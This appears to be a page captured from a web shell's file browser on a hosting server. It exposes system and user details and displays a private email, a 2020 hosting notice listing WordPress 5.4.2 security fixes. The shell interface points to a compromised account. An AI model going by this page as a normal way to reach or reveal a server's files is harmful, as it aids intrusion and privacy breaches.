HEX
Server: Apache/2
System: Linux server.vm113-cu.cl1.il.proginter.com 4.18.0-553.78.1.el8_10.x86_64 #1 SMP Tue Oct 7 04:15:13 EDT 2025 x86_64
User: regevl (1053)
PHP: 7.4.33
Disabled: exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
$ pwd: /home/regevl/Maildir/new/
Upload Files
File: /home/regevl/Maildir/new/1591858358.H374015P729.server.ded1-sh.uk.proginter.com
Return-path: <SRS0=TRgPDe=7Y=proginter.com=customer@tll-hospitality.co.il>
Envelope-to: regevl@tll-hospitality.co.il
Delivery-date: Thu, 11 Jun 2020 09:52:38 +0300
Received: from root by server.ded1-sh.uk.proginter.com with local (Exim 4.92.3)
	(envelope-from <customer@proginter.com>)
	id 1jjH4o-0000Be-BV
	for regevl@tll-hospitality.co.il; Thu, 11 Jun 2020 09:52:38 +0300
To: regevl@tll-hospitality.co.il
Subject: [ProgInter Applications] WordPress 5.4.2 now available
Date: Thu, 11 Jun 2020 07:52:38 +0100
From: customer@proginter.com
Message-ID: <33713ad499debc1dd4f8390d89f06fbe@server.ded1-sh.uk.proginter.com>
X-Mailer: Installatron Plugin 9.1.51
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

This is an automated email from ProgInter Applications. To unsubscribe from these emails or to change notification settings, login to your web hosting control panel, navigate to the ProgInter Applications tool, and select the installed applications you wish to modify.

An update to WordPress 5.4.2  is now available for the WordPress installations you are managing using ProgInter Applications. The following can be updated:

- http://applisend.to-web.co.il


The changes for this version are:

Security
* Props to Sam Thomas (jazzy2fives) for finding an XSS issue where authenticated users with low privileges are able to add JavaScript to posts in the block editor.
* Props to Luigi – (gubello.me) for discovering an XSS issue where authenticated users with upload permissions are able to add JavaScript to media files.
* Props to Ben Bidner of the WordPress Security Team for finding an open redirect issue in wp_validate_redirect().
* Props to Nrimo Ing Pandum for finding an authenticated XSS issue via theme uploads.
* Props to Simon Scannell of RIPS Technologies for finding an issue where set-screen-option can be misused by plugins leading to privilege escalation.
* Props to Carolina Nymark for discovering an issue where comments from password-protected posts and pages could be displayed under certain conditions.

Login to your web hosting control panel and navigate to the ProgInter Applications tool to update your installed applications.

End of report.
@ Telegram